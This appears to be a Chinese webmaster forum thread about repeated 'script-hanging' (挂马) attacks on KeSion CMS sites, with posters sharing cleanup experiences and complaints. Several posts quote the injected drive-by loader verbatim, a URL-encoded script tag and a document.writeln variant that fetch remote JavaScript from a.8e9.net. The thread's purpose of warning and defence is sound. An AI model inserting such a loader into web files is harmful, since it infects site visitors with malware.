我的网站TOOKMAX 昨晚七时左右打开时,360安全卫士警告

[

发现挂马网页

http://a.8e9.net/cnzz.htm

]

打开这个链接后出现"站长统计"四个字,点击后是站长统计的登录页面

查看八易娱乐网的站点统计

------------------------------------------------

在搜索引擎上搜索不到任何相关信息

用排除法终于查到

/KS_inc/Language.js

被更改过,删除最后几行代码[删的太急,没有拷贝下来]后恢复正常

因为不想在页面去掉"繁体中文"这个功能,所以没有将Language.js改名,只是更改Ks_ins文件夹和所有文件属性为只读...

结果你猜出怎么样? 今天早上打开网站,竟然又被改了!!!!!!!!!

无奈只好去掉"繁体中文"这个功能了

记得以前KS_inc这个目录下的Ajax.js也被挂马的瞄上了,现在又开始改其它的JS文件,以后不知又会改哪个文件,
希望官方能予以关注下

-----------------------------------------

顺便在这里鄙视(竖两根中指)一下那些挂马的:

现在谁挣个钱都不容易,无论你们是出于什么目的这么做,丫有本事对着国外的网站使劲去, 别在这窝里横,这不叫本事
对我们这些可怜的中小站长下手,你就有成就感么?

5.01的照挂不勿。。。我也受不了了，3个站被挂。。。

备份数据库,清空服务器文件........重装CMS,恢复数据库文件........,总算是熬过来了

...这算是妥协了吧

不知5.0是不是要好一些了

我是反反复复的被挂了这个木马.和大家遇到的情况一模一样.

没删几分钟就又来了.

我已经没招了.

百度一下,http://www.baidu.com/s?wd=%3Cscript+src%3Dhttp%3A%2F%2F%2561%252E%2538%2565%2539%252E%256E%2565%2574%2F%2531%252E%256A%2573%3E%3C%2Fscript%3E

全是科讯用户被挂的这个木马.看来这个木马就是针对咱科讯用户的.希望官方重视.

就是这段代码

<script src=http://%61%2E%38%65%39%2E%6E%65%74/%31%2E%6A%73></script>

是的，他插代码的都是一些公用调用的JS，这样访客中标的几率大。

我昨晚打开首页，卡巴叫的不停，疯狂下载，MD，自己的电脑已经中标了，任务管理器都打不开，卡巴什么的都打不开。

随后，删掉所有ASP文件，设置那些目录只读。cao这帮垃圾！

刚看着你的贴子,网站又被挂上了........还是那个鸟网站

document.writeln("<script src=http:\/\/%61%2E%38%65%39%2E%6E%65%74\/%31%2E%6A%73><\/script>");

这回是在我自己写的JS文件中被弄上的...看来,他们是查看页面源代码找到网站共同调用的JS文件加码的

这下只能改目录权限了